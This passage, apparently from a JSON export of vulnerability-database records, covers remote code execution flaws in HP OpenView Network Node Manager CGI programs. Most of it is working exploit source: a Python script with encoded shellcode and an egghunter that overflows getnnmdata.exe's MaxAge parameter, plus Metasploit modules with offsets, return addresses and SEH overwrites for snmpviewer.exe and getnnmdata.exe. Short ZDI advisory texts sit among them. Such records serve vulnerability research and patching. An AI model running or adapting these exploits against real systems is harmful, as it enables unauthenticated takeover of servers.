Remote exploit for windows platform", "published": "2010-07-02T00:00:00", "type": "exploitdb", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2010-07-02T00:00:00", "id": "EDB-ID:14180", "href": "https://www.exploit-db.com/exploits/14180/", "sourceData": "# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution \r\n# Date: 2010.07.02\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: hp.com\r\n# Version: 7.53\r\n# Tested on: Windows 2003\r\n# CVE: CVE-2010-1553\r\n\r\n# Code :\r\n\r\n#!/usr/bin/python\r\n\r\nimport struct\r\nimport socket\r\nimport httplib\r\nimport urllib\r\n\r\n# calc.exe Windows Execute Command\r\nsc2 = (\r\n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\"\r\n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\"\r\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\r\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\r\n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\"\r\n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\"\r\n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\"\r\n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\"\r\n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\"\r\n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\"\r\n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\"\r\n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\"\r\n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\"\r\n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\"\r\n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a
\\x76\\x46\\x51\"\r\n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\"\r\n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\"\r\n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\"\r\n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\"\r\n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\"\r\n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\"\r\n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\"\r\n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\"\r\n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\"\r\n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\"\r\n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\"\r\n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\"\r\n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\"\r\n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\"\r\n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\"\r\n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\"\r\n)\r\n\r\negghunter = 
(\r\n\"\\x89\\xe1\\xda\\xd7\\xd9\\x71\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"\r\n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"\r\n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"\r\n\"\\x50\\x66\\x4f\\x71\\x4b\\x7a\\x49\\x6f\\x46\\x6f\\x50\\x42\\x51\\x42\\x43\"\r\n\"\\x5a\\x45\\x52\\x43\\x68\\x48\\x4d\\x46\\x4e\\x45\\x6c\\x47\\x75\\x42\\x7a\"\r\n\"\\x44\\x34\\x48\\x6f\\x4e\\x58\\x42\\x74\\x50\\x30\\x46\\x50\\x42\\x77\\x4c\"\r\n\"\\x4b\\x4a\\x5a\\x4e\\x4f\\x43\\x45\\x4a\\x4a\\x4c\\x6f\\x43\\x45\\x4a\\x47\"\r\n\"\\x49\\x6f\\x4b\\x57\\x41\\x41\"\r\n)\r\n\r\nret = struct.pack('<L',0x5A667A77) # ppr\r\njmp = \"\\x74\\x21\\x44\\x44\"\r\n\r\np = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter\r\n\r\nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2}\r\n\r\nc = httplib.HTTPConnection('172.16.29.149')\r\nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h)\r\nr = c.getresponse()\r\n\r\nprint r.status, r.reason\r\ndata = r.read()\r\nprint data\r\nc.close()\r\n\r\nprint \"\\nDone\\n\" \r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14180/"}, {"lastseen": "2016-02-02T07:05:21", "description": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow. CVE-2010-1552. 
Remote exploit for windows platform", "published": "2011-03-23T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "modified": "2011-03-23T00:00:00", "id": "EDB-ID:17039", "href": "https://www.exploit-db.com/exploits/17039/", "sourceData": "##\r\n# $Id: hp_nnm_snmpviewer_actapp.rb 12098 2011-03-23 15:47:20Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\r\n\t\t\t\tprior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\r\n\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\r\n\t\t\t\tcode.\r\n\r\n\t\t\t\tThe vulnerable code lies within the a function within \"snmpviewer.exe\" with a\r\n\t\t\t\ttimestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\r\n\t\t\t\tor POST request. 
The request must contain 'act' and 'app' parameters which, when\r\n\t\t\t\tcombined, total more than the 1024 byte stack buffer can hold.\r\n\r\n\t\t\t\tIt is important to note that this vulnerability must be exploited by overwriting SEH.\r\n\t\t\t\tWhile the saved return address can be smashed, a function call that occurs before\r\n\t\t\t\tthe function returns calls \"exit\".\r\n\t\t\t} ,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'jduck' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12098 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1552' ],\r\n\t\t\t\t\t[ 'OSVDB', '64975' ],\r\n\t\t\t\t\t[ 'BID', '40068' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-083/' ],\r\n\t\t\t\t\t[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024, # 1024 byte buffer..\r\n\t\t\t\t\t'BadChars' =>\r\n\t\t\t\t\t\t# Not sure why this one has a different set of bad chars...\r\n\t\t\t\t\t\t(\r\n\t\t\t\t\t\t\t(0x00..0x08).to_a + (0x0b..0x1f).to_a +\r\n\t\t\t\t\t\t\t[ 0x21, 0x26, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f ]\r\n\t\t\t\t\t\t).pack('C*'),\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t# Manually use FPU to get EIP into ECX\r\n\t\t\t\t\t'PrependEncoder' => \"\\x89\\xe2\\xdb\\xdb\\xd9\\x72\\xf4\\x59\\x83\\xe9\\xf7\",\r\n\t\t\t\t\t'EncoderOptions' => { 'BufferRegister' => 'ecx' },\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 w/NNM_01201',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5a238ba7, # pop edx/pop ebp/ret - in ovsnmp.dll v1.30.10.9166\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 
(Windows 2003)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Debug Target',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0xdeadbeef, # crasher\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'May 11 2010'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tcgi = '/OvCgi/snmpviewer.exe'\r\n\r\n\t\t# \"ins\" must be \"load\" or \"content\"\r\n\t\tins_ok = [ 'load', 'content' ]\r\n\t\tins = ins_ok[rand(ins_ok.length)]\r\n\r\n\t\tstart = 'The specified Application/Action name is not defined.<p>Application:\"'\r\n\t\t#middle = '\"<p>Action:\"'\r\n\r\n\t\tia32 = Metasm::Ia32.new\r\n\r\n\t\t# SEH\r\n\t\tseh_offset = 1192\r\n\t\tseh_frame = rand_text(8)\r\n\r\n\t\t# Jump back to the payload, after p/p/r jumps to us.\r\n\t\tdistance = seh_offset - start.length + seh_frame.length # dry run\r\n\t\tjmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string\r\n\t\tdistance = seh_offset - start.length - jmp_back.length\r\n\t\tdistance += 8 if ins == 'content'\r\n\t\tjmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string\r\n\r\n\t\t# A short jump back to the long jump back :)\r\n\t\tjmp_small = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + jmp_back.length.to_s).encode_string\r\n\r\n\t\t# Fix up the SEH frame\r\n\t\tseh_frame[0,jmp_small.length] = jmp_small\r\n\t\tseh_frame[4,4] = [target.ret].pack('V')\r\n\r\n\t\t# Create the buffer\r\n\t\tbuf = ''\r\n\t\tbuf << payload.encoded\r\n\t\tpad = seh_offset - start.length - buf.length - jmp_back.length\r\n\t\tpad += 8 if ins == 'content'\r\n\t\tbuf << rand_text(pad)\r\n\t\tbuf << jmp_back\r\n\t\tbuf << seh_frame\r\n\r\n\t\tapp = buf\r\n\r\n\t\t# Force an exception writing 
off the end of the stack\r\n\t\taction = rand_text(1024)\r\n\r\n\t\t# Send the request\r\n\t\tif rand(2) > 0\r\n\t\t\tprint_status(\"Sending exploit via POST request (ins=#{ins})...\")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'uri'\t\t => cgi,\r\n\t\t\t\t'method'\t => \"POST\",\r\n\t\t\t\t'vars_post' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'ins' => ins,\r\n\t\t\t\t\t\t'act' => action,\r\n\t\t\t\t\t\t'app' => app\r\n\t\t\t\t\t}\r\n\t\t\t}, 3)\r\n\t\telse\r\n\t\t\tprint_status(\"Sending exploit via GET request (ins=#{ins})...\")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'uri'\t\t => cgi,\r\n\t\t\t\t'method'\t => \"GET\",\r\n\t\t\t\t'vars_get' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'ins' => ins,\r\n\t\t\t\t\t\t'act' => action,\r\n\t\t\t\t\t\t'app' => app\r\n\t\t\t\t\t}\r\n\t\t\t}, 3)\r\n\t\tend\r\n\r\n\t\tif res and res.code != 502\r\n\t\t\tprint_error(\"Eek! We weren't expecting a response, but we got one\")\r\n\t\t\tprint_status(res.inspect) if datastore['NNM_DEBUG']\r\n\t\tend\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\n\tdef wfs_delay\r\n\t\t5\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17039/"}], "zdi": [{"lastseen": "2020-06-22T11:42:04", "bulletinFamily": "info", "cvelist": ["CVE-2010-1554"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the getnnmdata.exe CGI. If this CGI is requested with an invalid iCount POST parameter a sprintf() call is made to log the error. However, no length check is performed on the variable contents before copying in to a fixed-length stack buffer. 
This can be leveraged by remote attackers to execute arbitrary code under the context of the webserver process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-085/", "id": "ZDI-10-085", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:39", "bulletinFamily": "info", "cvelist": ["CVE-2010-1553"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the getnnmdata.exe CGI. If this CGI is requested with an invalid MaxAge parameter, a sprintf() call is made to log the error. However, no length check is performed on the variable contents before they are copied into a fixed-length stack buffer. This can be leveraged by remote attackers to execute arbitrary code under the context of the webserver process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-084/", "id": "ZDI-10-084", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:00", "bulletinFamily": "info", "cvelist": ["CVE-2010-1550"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovet_demandpoll.exe process. This process can be started by invoking the webappmon.exe CGI application through the webserver. 
The process calls vnsprintf() directly with the contents of the 'sel' POST variable. By providing a malicious value, this format string vulnerability can be leveraged by remote attackers to execute arbitrary code under the context of the ovet_demandpoll.exe process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-081/", "id": "ZDI-10-081", "title": "HP OpenView NNM ovet_demandpoll sel CGI Variable Format String Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:41:11", "bulletinFamily": "info", "cvelist": ["CVE-2010-1552"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the snmpviewer.exe CGI. The doLoad function in this process calls sprintf() with a %s format specifier and unsanitized user input retrieved from two separate POST variables (act and app). By providing large enough strings, a remote attacker can cause a stack-based buffer overflow and eventually execute arbitrary code under the context of the webserver process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-083/", "id": "ZDI-10-083", "title": "HP OpenView NNM snmpviewer.exe CGI Multiple Variable Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:42:17", "bulletinFamily": "info", "cvelist": ["CVE-2010-1551"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. 
The specific flaw exists within the Network Monitor (netmon.exe) daemon. This process can be started by invoking the webappmon.exe CGI application through the webserver. When the _OVParseLLA function defined within ov.dll is called from netmon.exe it directly copies the value of the 'sel' POST variable into a fixed-length stack buffer with a call to strcpy(). This can be leveraged by remote attackers to execute arbitrary code under the context of the webserver process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-082/", "id": "ZDI-10-082", "title": "HP OpenView NNM netmon sel CGI Variable Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-06T23:01:43", "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.\n", "published": "2011-03-23T21:57:16", "type": "metasploit", "title": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_GETNNMDATA_ICOUNT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow',\n 'Description' 
=> %q{\n This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted ICount parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1554' ],\n [ 'OSVDB', '64976' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 750,\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\n 'DisableNops' => 'True',\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'ECX',\n },\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7582, 'Ret' => 0x5a01f277 } ],\n [ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2052, 'Ret' => 0x5a666d69 } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'May 11 2010'))\n end\n\n def exploit\n\n egg = rand_text_alpha_upper(4)\n\n hunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\n hunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n\n boom = rand_text_alpha_upper(target['Offset'])\n boom << generate_seh_record(target.ret)\n boom << hunter + egg + egg\n boom << payload.encoded\n boom << rand_text_alpha_upper(9024 - payload.encoded.length)\n\n sploit = \"SnmpVals=&ICount=-9#{boom}\"\n\n print_status(\"Trying target #{target.name}...\")\n\n send_request_cgi({\n 'uri'\t\t=> '/OvCgi/getnnmdata.exe',\n 'method'\t=> 'POST',\n 'data'\t\t=> sploit\n }, 8)\n\n handler\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb"}, {"lastseen": "2020-08-27T01:41:50", "description": "This module exploits a buffer 
overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.\n", "published": "2011-03-23T21:57:16", "type": "metasploit", "title": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_GETNNMDATA_MAXAGE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1553' ],\n [ 'OSVDB', '64976' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 750,\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\n 'DisableNops' => 'True',\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'ECX',\n },\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7591, 'Ret' => 0x5a01f277 } ],\n [ 'HP OpenView Network Node Manager 
7.53', { 'Offset' => 2054, 'Ret' => 0x5a666d69 } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'May 11 2010'))\n end\n\n def exploit\n\n egg = rand_text_alpha_upper(4)\n\n hunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\n hunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n\n boom = rand_text_alpha_upper(target['Offset'])\n boom << generate_seh_record(target.ret)\n boom << hunter + egg + egg\n boom << payload.encoded\n boom << rand_text_alpha_upper(9024 - payload.encoded.length)\n\n sploit = \"SnmpVals=&MaxAge=#{boom}\"\n\n print_status(\"Trying target #{target.name}...\")\n\n send_request_cgi({\n 'uri'\t\t=> '/OvCgi/getnnmdata.exe',\n 'method'\t=> 'POST',\n 'data'\t\t=> sploit\n }, 8)\n\n handler\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb"}, {"lastseen": "2020-08-12T22:10:37", "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within a function within \"snmpviewer.exe\" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. It is important to note that this vulnerability must be exploited by overwriting SEH. 
While the saved return address can be smashed, a function call that occurs before the function returns calls \"exit\".\n", "published": "2011-03-23T15:47:20", "type": "metasploit", "title": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "modified": "2017-09-14T02:03:34", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_SNMPVIEWER_ACTAPP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n code.\n\n The vulnerable code lies within a function within \"snmpviewer.exe\" with a\n timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n or POST request. 
